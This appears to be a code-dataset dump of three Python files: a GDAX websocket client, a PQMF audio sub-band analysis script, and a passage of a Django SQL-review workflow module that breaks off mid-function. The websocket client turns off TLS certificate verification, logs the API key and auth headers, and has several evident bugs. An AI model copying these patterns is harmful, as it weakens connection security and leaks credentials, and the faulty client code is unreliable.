source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
websocket.py | from __future__ import (absolute_import, division,
print_function, unicode_literals)
from gdax_websocket import constants
from gdax_websocket.auth.APIKeyAuth import generate_nonce, generate_signature
from gdax_websocket.settings import settings
from builtins import *
from pyee import EventEmitter
from time import sleep
from urllib.parse import urlparse
import alog
import json
import ssl
import threading
import time
import traceback
from websocket import WebsocketApp
PING_MESSAGE_PREFIX = 'primus::ping::'
CONN_TIMEOUT = 15
MAX_RECONNECT = 2
class GdaxWebsocket(EventEmitter, WebsocketApp):
def __init__(self,
shouldAuth=False,
heartbeatEnabled=True):
EventEmitter.__init__(self)
self.url = self.build_websocket_url()
self.header = self.get_auth()
self.sock = None
self.last_ping_tm = 0
self.last_pong_tm = 0
self.channels = []
self.reconnect_count = 0
self.__reset()
self.connect_websocket()
def re_connect(self):
alog.debug('## attempt reconnect: %s' % self.reconnect_count)
if self.reconnect_count == MAX_RECONNECT:
raise Exception("Exceeded reconnection attempts.")
sleep(1)
self.reconnect_count += 1
self.connect_websocket()
for channel in self.channels:
self._subscribe_to_channel(channel)
def build_websocket_url(self, base_url=settings.BASE_URL):
alog.debug('Build websocket url from: %s' % (base_url))
urlParts = list(urlparse(base_url))
queryString = ''
if self.heartbeatEnabled:
queryString = '?heartbeat=true'
url = "wss://{}/realtime{}".format(urlParts[1], queryString)
alog.debug(url)
return url
def connect_websocket(self):
"""Connect to the websocket in a thread."""
alog.debug("### Connecting Websocket ###")
# setup websocket.run_forever arguments
wsRunArgs = {
'sslopt': {"cert_reqs": ssl.CERT_NONE}
}
if self.heartbeatEnabled:
wsRunArgs['ping_timeout'] = 20
wsRunArgs['ping_interval'] = 60
alog.debug("websocket.run_forever: %s" % (wsRunArgs))
# Run the websocket on another thread and enable heartbeat
self.wst = threading.Thread(
target=lambda: self.websocket_run_forever(wsRunArgs)
)
self.wst.daemon = True
self.wst.start()
alog.info("### Started thread")
self.wait_for_connection()
def wait_for_connection(self):
conn_timeout = CONN_TIMEOUT
# Wait for connect before continuing
while (not self.ws.sock or not self.ws.sock.connected) \
and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
raise Exception("Couldn't connect to WS! Exiting.")
self.reconnect_count = 0
def on_ping(self, frame, data):
alog.debug('## ping')
alog.debug(data)
def on_pong(self, frame, data):
alog.debug('## pong')
alog.debug(data)
def subscribe_action(self, action, channel, instrument, action_handler):
channelKey = "{}:{}".format(channel, instrument)
alog.debug("Subscribe to action: %s" % (channelKey))
subscriptionMsg = {"op": "subscribe", "args": [channelKey]}
action_event_key = self.gen_action_event_key(action,
instrument,
channel)
alog.debug("Subscribe to %s" % (action_event_key))
self.on(action_event_key, action_handler)
if channelKey not in self.channels:
self.channels.append(channelKey)
alog.debug(subscriptionMsg)
self.send_message(subscriptionMsg)
def subscribe(self, channel, handler):
self._subscribe_to_channel(channel)
self.on(channel, handler)
if channel not in self.channels:
self.channels.append(channel)
def _subscribe_to_channel(self, channel):
subscriptionMsg = {"op": "subscribe", "args": [channel]}
self.send_message(subscriptionMsg)
def send_message(self, message):
self.ws.send(json.dumps(message))
def error(self, err):
alog.debug('this error...')
self._error = err
alog.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
def is_connected(self):
self.ws.sock.connected
def on_subscribe(self, message):
if message['success']:
alog.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please\
check and restart." % (
message['request']['args'][0], message['error']))
def on_ping(self, message):
timestamp = float(time.time() * 1000)
ping_timestamp = float(message[14:])
latency = timestamp - ping_timestamp
alog.debug("ping: %s" % (message))
alog.debug("ping timestamp: %s" % (timestamp))
alog.debug("message latency: %s" % (latency))
self.emit('latency', latency)
alog.debug(int(timestamp))
self.send_message("primus::pong::%s" % (timestamp))
def __on_message(self, ws, message):
self.on_message(message)
def on_message(self, message):
'''Handler for parsing WS messages.'''
# Check if ping message
ping_message = message[:14]
alog.debug(ping_message)
if ping_message == PING_MESSAGE_PREFIX:
alog.debug(message)
return self.emit('ping', message)
message = json.loads(message)
alog.debug(json.dumps(message, indent=4, sort_keys=True))
action = message['action'] if 'action' in message else None
try:
if action:
table = message['table']
event_name = ''
if table in constants.CHANNELS:
event_name = "%s:%s" % (action, table)
else:
if len(message['data']) > 0:
instrument = message['data'][0]['symbol']
event_name = self.gen_action_event_key(action,
instrument,
table)
alog.debug(event_name)
self.emit(event_name, message)
elif 'subscribe' in message:
self.emit('subscribe', message)
elif 'error' in message:
self.error(message['error'])
elif 'status' in message:
self.emit('status', message)
except:
alog.error(traceback.format_exc())
def on_status(self, message):
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
def gen_action_event_key(self, event, instrument, table):
return "%s:%s:%s" % (event, instrument, table)
#
# Private methods
#
def get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
alog.debug('shouldAuth: %s' % self.shouldAuth)
if self.shouldAuth:
alog.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature
# of a nonce and the WS API endpoint.
alog.debug(settings.GDAX_API_KEY)
nonce = generate_nonce()
api_signature = generate_signature(
settings.GDAX_API_SECRET, 'GET', '/realtime', nonce, '')
auth = [
"api-nonce: " + str(nonce),
"api-signature: " + api_signature,
"api-key:" + settings.GDAX_API_KEY
]
alog.debug(auth)
return auth
else:
return []
def wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'trade', 'quote'} <= set(self.data):
sleep(0.1)
def send_command(self, command, args=[]):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args}))
def on_open(self, ws):
alog.debug("Websocket Opened.")
def on_close(self, ws):
alog.info('Websocket Closed')
self.emit('close')
self.exit()
self.re_connect()
def on_error(self, ws, error):
if not self.exited:
self.emit('error', error)
self.error(error)
self.exit()
self.re_connect()
def reset(self):
self.remove_all_listeners()
self.on('subscribe', self.on_subscribe)
self.on('ping', self.on_ping)
self.exited = False
self._error = None
|
proc_wav_pqmf.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2021 Patrick Lumban Tobing (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
from __future__ import print_function
import argparse
from distutils.util import strtobool
import multiprocessing as mp
import os
import sys
import numpy as np
import soundfile as sf
from scipy.signal import lfilter
import torch
from pqmf import PQMF
from utils import find_files
from utils import read_txt
##FS = 16000
#FS = 22050
FS = 24000
##FS = 44100
##FS = 48000
ALPHA = 0.85
N_BANDS = 5
def deemphasis(x, alpha=ALPHA):
b = np.array([1.], x.dtype)
a = np.array([1., -alpha], x.dtype)
return lfilter(b, a, x)
def main():
parser = argparse.ArgumentParser(
description="making feature file argsurations.")
parser.add_argument(
"--waveforms", default=None,
help="directory or list of filename of input wavfile")
parser.add_argument(
"--writedir", default=None,
help="directory to save preprocessed wav file")
parser.add_argument(
"--writesyndir", default=None,
help="directory to save preprocessed wav file")
parser.add_argument(
"--fs", default=FS,
type=int, help="Sampling frequency")
parser.add_argument(
"--n_bands", default=N_BANDS,
type=int, help="number of bands for multiband analysis")
parser.add_argument(
"--alpha", default=ALPHA,
type=float, help="coefficient of pre-emphasis")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
parser.add_argument(
'--n_jobs', default=1,
type=int, help="number of parallel jobs")
args = parser.parse_args()
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
file_list = read_txt(args.waveforms)
# check directory existence
if not os.path.exists(args.writedir):
os.makedirs(args.writedir)
if not os.path.exists(args.writesyndir):
os.makedirs(args.writesyndir)
def noise_shaping(wav_list):
pqmf = PQMF(args.n_bands)
print(f'{pqmf.subbands} {pqmf.A} {pqmf.taps} {pqmf.cutoff_ratio} {pqmf.beta}')
#fs_band = args.fs // args.n_bands
#print(f'{pqmf.subbands} {pqmf.A} {pqmf.taps} {pqmf.cutoff_ratio} {pqmf.beta} {fs_band}')
for wav_name in wav_list:
x, fs = sf.read(wav_name)
## check sampling frequency
if not fs == args.fs:
print("ERROR: sampling frequency is not matched.")
sys.exit(1)
x_bands_ana = pqmf.analysis(torch.FloatTensor(x).unsqueeze(0).unsqueeze(0))
print(x_bands_ana.shape)
x_bands_syn = pqmf.synthesis(x_bands_ana)
print(x_bands_syn.shape)
for i in range(args.n_bands):
wav = np.clip(x_bands_ana[0,i].data.numpy(), -1, 0.999969482421875)
if args.n_bands < 10:
wavpath = os.path.join(args.writedir, os.path.basename(wav_name).split(".")[0]+"_B-"+str(i+1)+".wav")
else:
if i < args.n_bands - 1:
wavpath = os.path.join(args.writedir, os.path.basename(wav_name).split(".")[0]+"_B-0"+str(i+1)+".wav")
else:
wavpath = os.path.join(args.writedir, os.path.basename(wav_name).split(".")[0]+"_B-"+str(i+1)+".wav")
print(wavpath)
sf.write(wavpath, wav, fs, 'PCM_16')
#sf.write(wavpath, wav, fs_band, 'PCM_16')
wav = np.clip(x_bands_syn[0,0].data.numpy(), -1, 0.999969482421875)
wav = deemphasis(wav, alpha=args.alpha)
wavpath = os.path.join(args.writesyndir, os.path.basename(wav_name))
print(wavpath)
sf.write(wavpath, wav, fs, 'PCM_16')
# divie list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
processes = []
for f in file_lists:
p = mp.Process(target=noise_shaping, args=(f,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
sql_workflow.py | # -*- coding: UTF-8 -*-
import datetime
import logging
import re
import traceback
from threading import Thread
import simplejson as json
from django.contrib.auth.decorators import permission_required
from django.core.exceptions import PermissionDenied
from django.db import transaction, connection
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from django.utils import timezone
from common.config import SysConfig
from common.utils.const import Const, WorkflowDict
from common.utils.extend_json_encoder import ExtendJSONEncoder
from sql.models import SqlGroup, Users
from sql.utils.execute_sql import execute_call_back, execute_skipinc_call_back
from sql.utils.group import user_groups, user_instances
from sql.utils.inception import InceptionDao
from sql.utils.jobs import add_sqlcronjob, del_sqlcronjob
from sql.utils.sql_review import can_timingtask, getDetailUrl, can_cancel, can_execute
from sql.utils.workflow import Workflow
from .models import SqlWorkflow
logger = logging.getLogger('default')
sqlSHA1_cache = {} # 存储SQL文本与SHA1值的对应关系,尽量减少与数据库的交互次数,提高效率。格式: {工单ID1:{SQL内容1:sqlSHA1值1, SQL内容2:sqlSHA1值2},}
workflowOb = Workflow()
# 获取审核列表
@permission_required('sql.menu_sqlworkflow', raise_exception=True)
def sqlworkflowlist(request):
# 获取用户信息
user = request.user
limit = int(request.POST.get('limit'))
offset = int(request.POST.get('offset'))
limit = offset + limit
search = request.POST.get('search', '')
# 获取筛选参数
navStatus = request.POST.get('navStatus')
# 管理员可以看到全部工单,其他人能看到自己提交和审核的工单
user = request.user
# 全部工单里面包含搜索条件
if navStatus == 'all':
if user.is_superuser == 1:
workflowlist = SqlWorkflow.objects.filter(
Q(engineer_display__contains=search) | Q(workflow_name__contains=search)
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
"is_backup", "create_time", "instance_name", "db_name",
"group_name", "sql_syntax")
count = SqlWorkflow.objects.filter(
Q(engineer_display__contains=search) | Q(workflow_name__contains=search)).count()
elif user.has_perm('sql.sql_review') or user.has_perm('sql.sql_execute'):
# 先获取用户所在资源组列表
group_list = user_groups(user)
group_ids = [group.group_id for group in group_list]
workflowlist = SqlWorkflow.objects.filter(group_id__in=group_ids).filter(
Q(engineer_display__contains=search) | Q(workflow_name__contains=search)
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
"is_backup", "create_time", "instance_name", "db_name",
"group_name", "sql_syntax")
count = SqlWorkflow.objects.filter(group_id__in=group_ids).filter(
Q(engineer_display__contains=search) | Q(workflow_name__contains=search)
).count()
else:
workflowlist = SqlWorkflow.objects.filter(engineer=user.username).filter(
workflow_name__contains=search
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
"is_backup", "create_time", "instance_name", "db_name",
"group_name", "sql_syntax")
count = SqlWorkflow.objects.filter(engineer=user.username).filter(
workflow_name__contains=search).count()
elif navStatus in Const.workflowStatus.keys():
if user.is_superuser == 1:
workflowlist = SqlWorkflow.objects.filter(
status=Const.workflowStatus[navStatus]
).order_by('-create_time')[offset:limit].values("id", "workflow_name", "engineer_display", "status",
"is_backup", "create_time", "instance_name", "db_name",
"group_name", "sql_syntax")
count = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus]).count()
elif user.has_perm('sql.sql_review') or user.has_perm('sql.sql_execute'):
# 先获取用户所在资源组列表
group_list = user_groups(user)
group_ids = [group.group_id for group in group_list]
workflowlist = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], group_id__in=group_ids
).order_by('-create_time')[offset:limit].values("id",
"workflow_name",
"engineer_display",
"status",
"is_backup",
"create_time",
"instance_name",
"db_name",
"group_name",
"sql_syntax")
count = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], group_id__in=group_ids).count()
else:
workflowlist = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], engineer=user.username
).order_by('-create_time')[offset:limit].values("id",
"workflow_name",
"engineer_display",
"status",
"is_backup",
"create_time",
"instance_name",
"db_name",
"group_name",
"sql_syntax")
count = SqlWorkflow.objects.filter(status=Const.workflowStatus[navStatus], engineer=user.username).count()
else:
context = {'errMsg': '传入的navStatus参数有误!'}
return render(request, 'error.html', context)
# QuerySet 序列化
rows = [row for row in workflowlist]
result = {"total": count, "rows": rows}
# 返回查询结果
return HttpResponse(json.dumps(result, cls=ExtendJSONEncoder, bigint_as_string=True),
content_type='application/json')
# SQL检测
@permission_required('sql.sql_submit', raise_exception=True)
def simplecheck(request):
sql_content = request.POST.get('sql_content')
instance_name = request.POST.get('instance_name')
db_name = request.POST.get('db_name')
result = {'status': 0, 'msg': 'ok', 'data': {}}
# 服务器端参数验证
if sql_content is None or instance_name is None or db_name is None:
result['status'] = 1
result['msg'] = '页面提交参数可能为空'
return HttpResponse(json.dumps(result), content_type='application/json')
# # 删除注释语句
# sql_content = ''.join(
# map(lambda x: re.compile(r'(^--.*|^/\*.*\*/;\s*$)').sub('', x, count=1),
# sql_content.splitlines(1))).strip()
# # 去除空行
# sql_content = re.sub('[\r\n\f]{2,}', '\n', sql_content)
sql_content = sql_content.strip()
# 交给inception进行自动审核
try:
inception_result = InceptionDao(instance_name=instance_name).sqlautoReview(sql_content, db_name)
except Exception as e:
logger.error(traceback.format_exc())
result['status'] = 1
result['msg'] = str(e)
return HttpResponse(json.dumps(result), content_type='application/json')
if inception_result is None or len(inception_result) == 0:
result['status'] = 1
result['msg'] = 'inception返回的结果集为空!可能是SQL语句有语法错误'
return HttpResponse(json.dumps(result), content_type='application/json')
# 要把result转成JSON存进数据库里,方便SQL单子详细信息展示
column_list = ['ID', 'stage', 'errlevel', 'stagestatus', 'errormessage', 'SQL', 'Affected_rows', 'sequence',
'backup_dbname', 'execute_time', 'sqlsha1']
rows = []
CheckWarningCount = 0
CheckErrorCount = 0
for row_index, row_item in enumerate(inception_result):
row = {}
row['ID'] = row_item[0]
row['stage'] = row_item[1]
row['errlevel'] = row_item[2]
if row['errlevel'] == 1:
CheckWarningCount = CheckWarningCount + 1
elif row['errlevel'] == 2:
CheckErrorCount = CheckErrorCount + 1
row['stagestatus'] = row_item[3]
row['errormessage'] = row_item[4]
row['SQL'] = row_item[5]
row['Affected_rows'] = row_item[6]
row['sequence'] = row_item[7]
row['backup_dbname'] = row_item[8]
row['execute_time'] = row_item[9]
# row['sqlsha1'] = row_item[10]
rows.append(row)
result['data']['rows'] = rows
result['data']['column_list'] = column_list
result['data']['CheckWarningCount'] = CheckWarningCount
result['data']['CheckErrorCount'] = CheckErrorCount
return HttpResponse(json.dumps(result), content_type='application/json')
# SQL提交
@permission_required('sql.sql_submit', raise_exception=True)
def autoreview(request):
workflowid = request.POST.get('workflowid')
sql_content = request.POST['sql_content']
workflowName = request.POST['workflow_name']
group_name = request.POST['group_name']
group_id = SqlGroup.objects.get(group_name=group_name).group_id
instance_name = request.POST['instance_name']
db_name = request.POST.get('db_name')
isBackup = request.POST['is_backup']
notify_users = request.POST.getlist('notify_users')
# 服务器端参数验证
if sql_content is None or workflowName is None or instance_name is None or db_name is None or isBackup is None:
context = {'errMsg': '页面提交参数可能为空'}
return render(request, 'error.html', context)
# 验证组权限(用户是否在该组、该组是否有指定实例)
try:
user_instances(request.user, 'master').get(instance_name=instance_name)
except Exception:
context = {'errMsg': '你所在组未关联该主库!'}
return render(request, 'error.html', context)
# # 删除注释语句
# sql_content = ''.join(
# map(lambda x: re.compile(r'(^--.*|^/\*.*\*/;\s*$)').sub('', x, count=1),
# sql_content.splitlines(1))).strip()
# # 去除空行
# sql_content = re.sub('[\r\n\f]{2,}', '\n', sql_content)
sql_content = sql_content.strip()
if sql_content[-1] != ";":
context = {'errMsg': "SQL语句结尾没有以;结尾,请后退重新修改并提交!"}
return render(request, 'error.html', context)
# 交给inception进行自动审核
try:
inception_result = InceptionDao(instance_name=instance_name).sqlautoReview(sql_content, db_name)
except Exception as msg:
context = {'errMsg': msg}
return render(request, 'error.html', context)
if inception_result is None or len(inception_result) == 0:
context = {'errMsg': 'inception返回的结果集为空!可能是SQL语句有语法错误'}
return render(request, 'error.html', context)
# 要把result转成JSON存进数据库里,方便SQL单子详细信息展示
jsonResult = json.dumps(inception_result)
# 遍历result,看是否有任何自动审核不通过的地方,一旦有,则需要设置is_manual = 0,跳过inception直接执行
workflowStatus = Const.workflowStatus['manreviewing']
# inception审核不通过的工单,标记手动执行标签
is_manual = 0
for row in inception_result:
if row[2] == 2:
is_manual = 1
break
elif re.match(r"\w*comments\w*", row[4]):
is_manual = 1
break
# 判断SQL是否包含DDL语句,SQL语法 1、DDL,2、DML
sql_syntax = 2
for row in sql_content.strip(';').split(';'):
if re.match(r"^alter|^create|^drop|^truncate|^rename", row.strip().lower()):
sql_syntax = 1
break
# 调用工作流生成工单
# 使用事务保持数据一致性
try:
with transaction.atomic():
# 存进数据库里
engineer = request.user.username
if not workflowid:
sql_workflow = SqlWorkflow()
sql_workflow.create_time = timezone.now()
else:
sql_workflow = SqlWorkflow.objects.get(id=int(workflowid))
sql_workflow.workflow_name = workflowName
sql_workflow.group_id = group_id
sql_workflow.group_name = group_name
sql_workflow.engineer = engineer
sql_workflow.engineer_display = request.user.display
sql_workflow.audit_auth_groups = Workflow.auditsettings(group_id, WorkflowDict.workflow_type['sqlreview'])
sql_workflow.status = workflowStatus
sql_workflow.is_backup = isBackup
sql_workflow.review_content = jsonResult
sql_workflow.instance_name = instance_name
sql_workflow.db_name = db_name
sql_workflow.sql_content = sql_content
sql_workflow.execute_result = ''
sql_workflow.is_manual = is_manual
sql_workflow.audit_remark = ''
sql_workflow.sql_syntax = sql_syntax
sql_workflow.save()
workflowId = sql_workflow.id
# 自动审核通过了,才调用工作流
if workflowStatus == Const.workflowStatus['manreviewing']:
# 调用工作流插入审核信息, 查询权限申请workflow_type=2
# 抄送通知人
listCcAddr = [email['email'] for email in
Users.objects.filter(username__in=notify_users).values('email')]
workflowOb.addworkflowaudit(request, WorkflowDict.workflow_type['sqlreview'], workflowId,
listCcAddr=listCcAddr)
except Exception as msg:
logger.error(traceback.format_exc())
context = {'errMsg': msg}
return render(request, 'error.html', context)
return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# 审核通过,不执行
@permission_required('sql.sql_review', raise_exception=True)
def passed(request):
workflowId = request.POST['workflowid']
if workflowId == '' or workflowId is None:
context = {'errMsg': 'workflowId参数为空.'}
return render(request, 'error.html', context)
workflowId = int(workflowId)
workflowDetail = SqlWorkflow.objects.get(id=workflowId)
audit_remark = request.POST.get('audit_remark', '')
user = request.user
if Workflow.can_review(request.user, workflowId, 2) is False:
context = {'errMsg': '你无权操作当前工单!'}
return render(request, 'error.html', context)
# 使用事务保持数据一致性
try:
with transaction.atomic():
# 调用工作流接口审核
# 获取audit_id
audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
auditresult = workflowOb.auditworkflow(request, audit_id, WorkflowDict.workflow_status['audit_success'],
user.username, audit_remark)
# 按照审核结果更新业务表审核状态
if auditresult['data']['workflow_status'] == WorkflowDict.workflow_status['audit_success']:
# 将流程状态修改为审核通过,并更新reviewok_time字段
workflowDetail.status = Const.workflowStatus['pass']
workflowDetail.reviewok_time = timezone.now()
workflowDetail.audit_remark = audit_remark
workflowDetail.save()
except Exception as msg:
logger.error(traceback.format_exc())
context = {'errMsg': msg}
return render(request, 'error.html', context)
return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# 仅执行SQL
@permission_required('sql.sql_execute', raise_exception=True)
def execute(request):
workflowId = request.POST['workflowid']
if workflowId == '' or workflowId is None:
context = {'errMsg': 'workflowId参数为空.'}
return render(request, 'error.html', context)
workflowId = int(workflowId)
workflowDetail = SqlWorkflow.objects.get(id=workflowId)
instance_name = workflowDetail.instance_name
db_name = workflowDetail.db_name
url = getDetailUrl(request, workflowId)
if can_execute(request.user, workflowId) is False:
context = {'errMsg': '你无权操作当前工单!'}
return render(request, 'error.html', context)
# 判断是否高危SQL,禁止执行
if SysConfig().sys_config.get('critical_ddl_regex', '') != '':
if InceptionDao().criticalDDL(workflowDetail.sql_content):
context = {'errMsg': '高危语句,禁止执行!'}
return render(request, 'error.html', context)
# 将流程状态修改为执行中,并更新reviewok_time字段
workflowDetail.status = Const.workflowStatus['executing']
workflowDetail.reviewok_time = timezone.now()
workflowDetail.save()
# 判断是通过inception执行还是直接执行,is_manual=0则通过inception执行,is_manual=1代表inception审核不通过,需要直接执行
if workflowDetail.is_manual == 0:
# 执行之前重新split并check一遍,更新SHA1缓存;因为如果在执行中,其他进程去做这一步操作的话,会导致inception core dump挂掉
try:
splitReviewResult = InceptionDao(instance_name=instance_name).sqlautoReview(workflowDetail.sql_content,
db_name,
isSplit='yes')
except Exception as msg:
logger.error(traceback.format_exc())
context = {'errMsg': msg}
return render(request, 'error.html', context)
workflowDetail.review_content = json.dumps(splitReviewResult)
try:
workflowDetail.save()
except Exception:
# 关闭后重新获取连接,防止超时
connection.close()
workflowDetail.save()
# 采取异步回调的方式执行语句,防止出现持续执行中的异常
t = Thread(target=execute_call_back, args=(workflowId, instance_name, url))
t.start()
else:
# 采取异步回调的方式执行语句,防止出现持续执行中的异常
t = Thread(target=execute_skipinc_call_back,
args=(workflowId, instance_name, db_name, workflowDetail.sql_content, url))
t.start()
# 删除定时执行job
if workflowDetail.status == Const.workflowStatus['timingtask']:
job_id = Const.workflowJobprefix['sqlreview'] + '-' + str(workflowId)
del_sqlcronjob(job_id)
# 增加工单日志
# 获取audit_id
audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
workflowOb.add_workflow_log(audit_id=audit_id,
operation_type=5,
operation_type_desc='执行工单',
operation_info="人工操作执行",
operator=request.user.username,
operator_display=request.user.display
)
return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# 定时执行SQL
@permission_required('sql.sql_execute', raise_exception=True)
def timingtask(request):
workflowId = request.POST.get('workflowid')
run_date = request.POST.get('run_date')
if run_date is None or workflowId is None:
context = {'errMsg': '时间不能为空'}
return render(request, 'error.html', context)
elif run_date < datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'):
context = {'errMsg': '时间不能小于当前时间'}
return render(request, 'error.html', context)
workflowDetail = SqlWorkflow.objects.get(id=workflowId)
if can_timingtask(request.user, workflowId) is False:
context = {'errMsg': '你无权操作当前工单!'}
return render(request, 'error.html', context)
# 判断是否高危SQL,禁止执行
if SysConfig().sys_config.get('critical_ddl_regex', '') != '':
if InceptionDao().criticalDDL(workflowDetail.sql_content):
context = {'errMsg': '高危语句,禁止执行!'}
return render(request, 'error.html', context)
run_date = datetime.datetime.strptime(run_date, "%Y-%m-%d %H:%M:%S")
url = getDetailUrl(request, workflowId)
job_id = Const.workflowJobprefix['sqlreview'] + '-' + str(workflowId)
# 使用事务保持数据一致性
try:
with transaction.atomic():
# 将流程状态修改为定时执行
workflowDetail.status = Const.workflowStatus['timingtask']
workflowDetail.save()
# 调用添加定时任务
add_sqlcronjob(job_id, run_date, workflowId, url)
# 增加工单日志
# 获取audit_id
audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
workflowOb.add_workflow_log(audit_id=audit_id,
operation_type=4,
operation_type_desc='定时执行',
operation_info="定时执行时间:{}".format(run_date),
operator=request.user.username,
operator_display=request.user.display
)
except Exception as msg:
logger.error(traceback.format_exc())
context = {'errMsg': msg}
return render(request, 'error.html', context)
return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
# 终止流程
def cancel(request):
workflowId = request.POST['workflowid']
if workflowId == '' or workflowId is None:
context = {'errMsg': 'workflowId参数为空.'}
return render(request, 'error.html', context)
workflowId = int(workflowId)
workflowDetail = SqlWorkflow.objects.get(id=workflowId)
audit_remark = request.POST.get('cancel_remark')
if audit_remark is None:
context = {'errMsg': '终止原因不能为空'}
return render(request, 'error.html', context)
user = request.user
if can_cancel(request.user, workflowId) is False:
context = {'errMsg': '你无权操作当前工单!'}
return render(request, 'error.html', context)
# 使用事务保持数据一致性
try:
with transaction.atomic():
# 调用工作流接口取消或者驳回
# 获取audit_id
audit_id = Workflow.auditinfobyworkflow_id(workflow_id=workflowId,
workflow_type=WorkflowDict.workflow_type['sqlreview']).audit_id
# 仅待审核的需要调用工作流,审核通过的不需要
if workflowDetail.status != Const.workflowStatus['manreviewing']:
# 增加工单日志
if user.username == workflowDetail.engineer:
workflowOb.add_workflow_log(audit_id=audit_id,
operation_type=3,
operation_type_desc='取消执行',
operation_info="取消原因:{}".format(audit_remark),
operator=request.user.username,
operator_display=request.user.display
)
else:
workflowOb.add_workflow_log(audit_id=audit_id,
operation_type=2,
operation_type_desc='审批不通过',
operation_info="审批备注:{}".format(audit_remark),
operator=request.user.username,
operator_display=request.user.display
)
else:
if user.username == workflowDetail.engineer:
workflowOb.auditworkflow(request, audit_id,
WorkflowDict.workflow_status['audit_abort'],
user.username, audit_remark)
# 非提交人需要校验审核权限
elif user.has_perm('sql.sql_review'):
workflowOb.auditworkflow(request, audit_id,
WorkflowDict.workflow_status['audit_reject'],
user.username, audit_remark)
else:
raise PermissionDenied
# 删除定时执行job
if workflowDetail.status == Const.workflowStatus['timingtask']:
job_id = Const.workflowJobprefix['sqlreview'] + '-' + str(workflowId)
del_sqlcronjob(job_id)
# 将流程状态修改为人工终止流程
workflowDetail.status = Const.workflowStatus['abort']
workflowDetail.audit_remark = audit_remark
workflowDetail.save()
except Exception as msg:
logger.error(traceback.format_exc())
context = {'errMsg': msg}
return render(request, 'error.html', context)
return HttpResponseRedirect(reverse('sql:detail', args=(workflowId,)))
def getSqlSHA1(workflowId):
"""调用django ORM从数据库里查出review_content,从其中获取sqlSHA1值"""
workflowDetail = get_object_or_404(SqlWorkflow, pk=workflowId)
dictSHA1 = {}
# 使用json.loads方法,把review_content从str转成list,
listReCheckResult = json.loads(workflowDetail.review_content)
for rownum in range(len(listReCheckResult)):
id = rownum + 1
sqlSHA1 = listReCheckResult[rownum][10]
if sqlSHA1 != '':
dictSHA1[id] = sqlSHA1
if dictSHA1 != {}:
# 如果找到有sqlSHA1值,说明是通过pt-OSC操作的,将其放入缓存。
# 因为使用OSC执行的SQL占较少数,所以不设置缓存过期时间
sqlSHA1_cache[workflowId] = dictSHA1
return dictSHA1
def getOscPercent(request):
"""获取该SQL的pt-OSC执行进度和剩余时间"""
workflowId = request.POST['workflowid']
sqlID = request.POST['sqlID']
if workflowId == '' or workflowId is None or sqlID == '' or sqlID is None:
context = {"status": -1, 'msg': 'workflowId或sqlID参数为空.', "data": ""}
return HttpResponse(json.dumps(context), content_type='application/json')
workflowId = int(workflowId)
sqlID = int(sqlID)
dictSHA1 = {}
if workflowId in sqlSHA1_cache:
dictSHA1 = sqlSHA1_cache[workflowId]
# cachehit = "已命中"
else:
dictSHA1 = getSqlSHA1(workflowId)
if dictSHA1 != {} and sqlID in dictSHA1:
sqlSHA1 = dictSHA1[sqlID]
try:
result = InceptionDao().getOscPercent(sqlSHA1) # 成功获取到SHA1值,去inception里面查询进度
except Exception as msg:
logger.error(traceback.format_exc())
result = {'status': 1, 'msg': msg, 'data': ''}
return HttpResponse(json.dumps(result), content_type='application/json')
if result["status"] == 0:
# 获取到进度值
pctResult = result
else:
# result["status"] == 1, 未获取到进度值,需要与workflow.execute_result对比,来判断是已经执行过了,还是还未执行
execute_result = SqlWorkflow.objects.get(id=workflowId).execute_result
try:
listExecResult = json.loads(execute_result)
except ValueError:
listExecResult = execute_result
if type(listExecResult) == list and len(listExecResult) >= sqlID - 1:
if dictSHA1[sqlID] in listExecResult[sqlID - 1][10]:
# 已经执行完毕,进度值置为100
pctResult = {"status": 0, "msg": "ok", "data": {"percent": 100, "timeRemained": ""}}
else:
# 可能因为前一条SQL是DML,正在执行中;或者还没执行到这一行。但是status返回的是4,而当前SQL实际上还未开始执行。这里建议前端进行重试
